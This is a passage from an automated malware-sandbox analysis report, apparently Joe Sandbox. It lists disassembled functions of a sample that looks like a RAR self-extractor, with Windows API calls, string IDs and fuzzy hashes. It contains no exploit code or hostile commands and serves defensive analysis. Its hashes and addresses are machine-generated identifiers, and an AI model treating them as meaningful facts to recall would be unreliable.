                  Download Yara Rule
                  APIs
                    • Part of subcall function 0017130B: GetDlgItem.USER32(00000000,00003021), ref: 0017134F
                    • Part of subcall function 0017130B: SetWindowTextW.USER32(00000000,001A35B4), ref: 00171365
                  • EndDialog.USER32(?,00000001), ref: 0018AD20
                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0018AD47
                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0018AD60
                  • SetWindowTextW.USER32(?,?), ref: 0018AD71
                  • GetDlgItem.USER32(?,00000065), ref: 0018AD7A
                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0018AD8E
                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0018ADA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: MessageSend$Item$TextWindow$Dialog
                  • String ID: LICENSEDLG
                  • API String ID: 3214253823-2177901306
                  • Opcode ID: 5bdd91c59a2a6db549eda9fa5164933bb530c3e74042cfda33a5f43cdeaa77da
                  • Instruction ID: 5e628c78b32af59ef637c36fcd4cf27826dc44c11ec9b75f860470678c5357cb
                  • Opcode Fuzzy Hash: 5bdd91c59a2a6db549eda9fa5164933bb530c3e74042cfda33a5f43cdeaa77da
                  • Instruction Fuzzy Hash: 3E21D8322411057BE2216F65DD49F3B3F6DEB5A746F414106F604D2CA0DB62AA40DB32
                  Function 00179443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00179448
                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0017946B
                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0017948A
                    • Part of subcall function 001817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0017BB05,00000000,.exe,?,?,00000800,?,?,001885DF,?), ref: 001817C2
                  • _swprintf.LIBCMT ref: 00179526
                    • Part of subcall function 0017400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0017401D
                  • MoveFileW.KERNEL32(?,?), ref: 00179595
                  • MoveFileW.KERNEL32(?,?), ref: 001795D5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                  • String ID: rtmp%d
                  • API String ID: 2111052971-3303766350
                  • Opcode ID: d9bd64126014b0c7d45b769ab1e0174d7515c7ef3726027fb1b217bb6aa886d9
                  • Instruction ID: 7d0efd8d7516d179105be7daeaf0e77732e80aa9e244eb92d851056b2816cbba
                  • Opcode Fuzzy Hash: d9bd64126014b0c7d45b769ab1e0174d7515c7ef3726027fb1b217bb6aa886d9
                  • Instruction Fuzzy Hash: C4414C72900258A6CF20EBA48C85EEF737CAF65380F0485A5B54DE3052EB748B8DCB64
                  Function 00188E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00188F38
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00188F59
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00188F80
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Global$AllocByteCharCreateMultiStreamWide
                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                  • API String ID: 4094277203-4209811716
                  • Opcode ID: fbe0d82925cf08445fa1087f1d237e8c7fa9137d87a3e295dc9b065884fcbb35
                  • Instruction ID: c37f57212af0f60180bc3cc478078eacdd4a3cdb667d53ce8ff92b88554633ea
                  • Opcode Fuzzy Hash: fbe0d82925cf08445fa1087f1d237e8c7fa9137d87a3e295dc9b065884fcbb35
                  • Instruction Fuzzy Hash: DC317B325083017BEB24BB349C02FAFBB68DFA6720F40011EF911961C1EF649B09C7A5
                  Function 00180A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                  Download Yara Rule
                  APIs
                  • __aulldiv.LIBCMT ref: 00180A9D
                    • Part of subcall function 0017ACF5: GetVersionExW.KERNEL32(?), ref: 0017AD1A
                  • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00180AC0
                  • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00180AD2
                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00180AE3
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00180AF3
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00180B03
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00180B3D
                  • __aullrem.LIBCMT ref: 00180BCB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                  • String ID:
                  • API String ID: 1247370737-0
                  • Opcode ID: 73a2fd2f8a54d655e759409f363a984358ffa0e773ca779a1964d7a9e9eef816
                  • Instruction ID: a9264b71382f973254487f1314328f412b0da411dbbb32701214b2046712eac5
                  • Opcode Fuzzy Hash: 73a2fd2f8a54d655e759409f363a984358ffa0e773ca779a1964d7a9e9eef816
                  • Instruction Fuzzy Hash: 514139B5408306AFC354DF64C88096BFBF8FF88715F004A2EF59692650E779E688CB52
                  Function 0019EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                  Download Yara Rule
                  APIs
                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0019F5A2,?,00000000,?,00000000,00000000), ref: 0019EE6F
                  • __fassign.LIBCMT ref: 0019EEEA
                  • __fassign.LIBCMT ref: 0019EF05
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0019EF2B
                  • WriteFile.KERNEL32(?,?,00000000,0019F5A2,00000000,?,?,?,?,?,?,?,?,?,0019F5A2,?), ref: 0019EF4A
                  • WriteFile.KERNEL32(?,?,00000001,0019F5A2,00000000,?,?,?,?,?,?,?,?,?,0019F5A2,?), ref: 0019EF83
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID:
                  • API String ID: 1324828854-0
                  • Opcode ID: 3473b2c1110c8d0dad15a94ea6e0120e208879725c94f35d54929182dd84300d
                  • Instruction ID: c8de706726131ca9a213b41da6f53c64b7a750d292b57194147792d9ed9aedc9
                  • Opcode Fuzzy Hash: 3473b2c1110c8d0dad15a94ea6e0120e208879725c94f35d54929182dd84300d
                  • Instruction Fuzzy Hash: 97519E71E00209AFDF14CFA8D885BEEBBF9EF09310F24451AE555E7691E731AA50CB60
                  Function 0018C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                  Download Yara Rule
                  APIs
                  • GetTempPathW.KERNEL32(00000800,?), ref: 0018C54A
                  • _swprintf.LIBCMT ref: 0018C57E
                    • Part of subcall function 0017400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0017401D
                  • SetDlgItemTextW.USER32(?,00000066,001B946A), ref: 0018C59E
                  • _wcschr.LIBVCRUNTIME ref: 0018C5D1
                  • EndDialog.USER32(?,00000001), ref: 0018C6B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                  • String ID: %s%s%u
                  • API String ID: 2892007947-1360425832
                  • Opcode ID: 0815b6ee9548dda019f0735218e2f7f9637904ac031436d44f07db935d178be6
                  • Instruction ID: 66194b29d31c703a1d1f311fef3e0b4ea8c7018dc2bf972b60826dad530e1469
                  • Opcode Fuzzy Hash: 0815b6ee9548dda019f0735218e2f7f9637904ac031436d44f07db935d178be6
                  • Instruction Fuzzy Hash: 42416F71D00618EADB26EBA0DC45EEA77BDAF18705F1080A6F509E7161E7719BC4CFA0
                  Function 00189635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                  Download Yara Rule
                  APIs
                  • ShowWindow.USER32(?,00000000), ref: 0018964E
                  • GetWindowRect.USER32(?,00000000), ref: 00189693
                  • ShowWindow.USER32(?,00000005,00000000), ref: 0018972A
                  • SetWindowTextW.USER32(?,00000000), ref: 00189732
                  • ShowWindow.USER32(00000000,00000005), ref: 00189748
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Window$Show$RectText
                  • String ID: RarHtmlClassName
                  • API String ID: 3937224194-1658105358
                  • Opcode ID: de15f341872cfdeed324728dc92205476df26cde5e2478b2ce0ef63f2e2e1e58
                  • Instruction ID: 951859ec0dccdf631fabd68bede8468bb04f76fb9882230e3a75844d07d3a0d3
                  • Opcode Fuzzy Hash: de15f341872cfdeed324728dc92205476df26cde5e2478b2ce0ef63f2e2e1e58
                  • Instruction Fuzzy Hash: 37310131006210EFCB21AF60DC48B2B7BA8FF58301F09855AFE599A152DB34DA44CF61
                  Function 0019BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0019BF79: _free.LIBCMT ref: 0019BFA2
                  • _free.LIBCMT ref: 0019C003
                    • Part of subcall function 001984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?), ref: 001984F4
                    • Part of subcall function 001984DE: GetLastError.KERNEL32(?,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?,?), ref: 00198506
                  • _free.LIBCMT ref: 0019C00E
                  • _free.LIBCMT ref: 0019C019
                  • _free.LIBCMT ref: 0019C06D
                  • _free.LIBCMT ref: 0019C078
                  • _free.LIBCMT ref: 0019C083
                  • _free.LIBCMT ref: 0019C08E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                  • Instruction ID: f007d95f1721c60f662579466247073374e1a5d02528f9a4b22ebee83c5ee04f
                  • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                  • Instruction Fuzzy Hash: 83112171544B08FADE30BBB0DD8BFCBB79D6F15700F408865B29DA6452DB65F9048B90
                  Function 001920CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,?,001920C1,0018FB12), ref: 001920D8
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001920E6
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001920FF
                  • SetLastError.KERNEL32(00000000,?,001920C1,0018FB12), ref: 00192151
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: a4e915863b275400ceebfc43806b863baed069de561b83268ef8e3f51516f839
                  • Instruction ID: 0f74f893245c3252031b55057dd1544d179edbef96b6eab9c4fe4022e26ccf28
                  • Opcode Fuzzy Hash: a4e915863b275400ceebfc43806b863baed069de561b83268ef8e3f51516f839
                  • Instruction Fuzzy Hash: DF01FC322493117EBF552BB57C8561A6B84FB23B707210B39F224554F0EF214D515244
                  Function 0018DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                  • API String ID: 0-1718035505
                  • Opcode ID: 0daa597c26624ba65e8507a4d6fe3d5dcd313d0eeb5db6dfc250f1afc714271a
                  • Instruction ID: 4b0c002f22b26923c5e3e8497fd28ac491b444ebb03ddd60ce828a549d4ef43c
                  • Opcode Fuzzy Hash: 0daa597c26624ba65e8507a4d6fe3d5dcd313d0eeb5db6dfc250f1afc714271a
                  • Instruction Fuzzy Hash: 1901F4726527229B4F227EB87D817AA6794AB46352720027EF501D32C0EB91CAC1DFA0
                  Function 00180CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                  Download Yara Rule
                  APIs
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00180D0D
                    • Part of subcall function 0017ACF5: GetVersionExW.KERNEL32(?), ref: 0017AD1A
                  • LocalFileTimeToFileTime.KERNEL32(?,00180CB8), ref: 00180D31
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00180D47
                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00180D56
                  • SystemTimeToFileTime.KERNEL32(?,00180CB8), ref: 00180D64
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00180D72
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Time$File$System$Local$SpecificVersion
                  • String ID:
                  • API String ID: 2092733347-0
                  • Opcode ID: f60cd33516ec209a1cb256c2799421ff948c0ccecca4e8fc98c7a0738b1d02ce
                  • Instruction ID: c8fd2e6c548856a2f21795582dd9d34526a99ecc562ea2e82685afd83320f9a1
                  • Opcode Fuzzy Hash: f60cd33516ec209a1cb256c2799421ff948c0ccecca4e8fc98c7a0738b1d02ce
                  • Instruction Fuzzy Hash: 7E31D87A90020AEBCB00DFE4C9859EFFBBCFF58700B04455AE955E3610E7309685CB64
                  Function 001891B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _memcmp
                  • String ID:
                  • API String ID: 2931989736-0
                  • Opcode ID: 5525392069f73927a4d337fafa7b85fe6820b119b54b9a1820ecc5e8c69e6541
                  • Instruction ID: 67254fa7661f70ae3e85d4647814f93a8beb0e718a9f485e5c75fca14ae3a1de
                  • Opcode Fuzzy Hash: 5525392069f73927a4d337fafa7b85fe6820b119b54b9a1820ecc5e8c69e6541
                  • Instruction Fuzzy Hash: 8921A97160410EBBDB05BE14CC81E7B77AEEF91794B188228FC099B202E370DF455B90
                  Function 00198FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,001B0EE8,00193E14,001B0EE8,?,?,00193713,00000050,?,001B0EE8,00000200), ref: 00198FA9
                  • _free.LIBCMT ref: 00198FDC
                  • _free.LIBCMT ref: 00199004
                  • SetLastError.KERNEL32(00000000,?,001B0EE8,00000200), ref: 00199011
                  • SetLastError.KERNEL32(00000000,?,001B0EE8,00000200), ref: 0019901D
                  • _abort.LIBCMT ref: 00199023
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID:
                  • API String ID: 3160817290-0
                  • Opcode ID: dfade85754e7e9d4bd781f23be1eba4c0b3112adcca22d39bcd30c04bbc7f83b
                  • Instruction ID: 739e9712cd043c859841f53764a887127e886320203ae3a8800b58d474c3939f
                  • Opcode Fuzzy Hash: dfade85754e7e9d4bd781f23be1eba4c0b3112adcca22d39bcd30c04bbc7f83b
                  • Instruction Fuzzy Hash: D2F04C355046006BCF2137386C0AF2B296AAFE3770F360018F429D3692EF21DD015050
                  Function 0018D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                  Download Yara Rule
                  APIs
                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0018D2F2
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0018D30C
                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0018D31D
                  • TranslateMessage.USER32(?), ref: 0018D327
                  • DispatchMessageW.USER32(?), ref: 0018D331
                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0018D33C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                  • String ID:
                  • API String ID: 2148572870-0
                  • Opcode ID: 0c1fd9d791457b4bd0dc094b35e5ecfabda620676b74749b45f2056b3cdc5a73
                  • Instruction ID: d6f56bacc3f775839182c45ca2996d69aba3a115d17d9f902a6ccbb1e4f9ac0e
                  • Opcode Fuzzy Hash: 0c1fd9d791457b4bd0dc094b35e5ecfabda620676b74749b45f2056b3cdc5a73
                  • Instruction Fuzzy Hash: 60F031B1A02219ABCB206BA5EC4DEDBBF6DEF52351F008012F916D2450D6348681CBB1
                  Function 0018C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                  Download Yara Rule
                  APIs
                  • _wcschr.LIBVCRUNTIME ref: 0018C435
                    • Part of subcall function 001817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0017BB05,00000000,.exe,?,?,00000800,?,?,001885DF,?), ref: 001817C2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
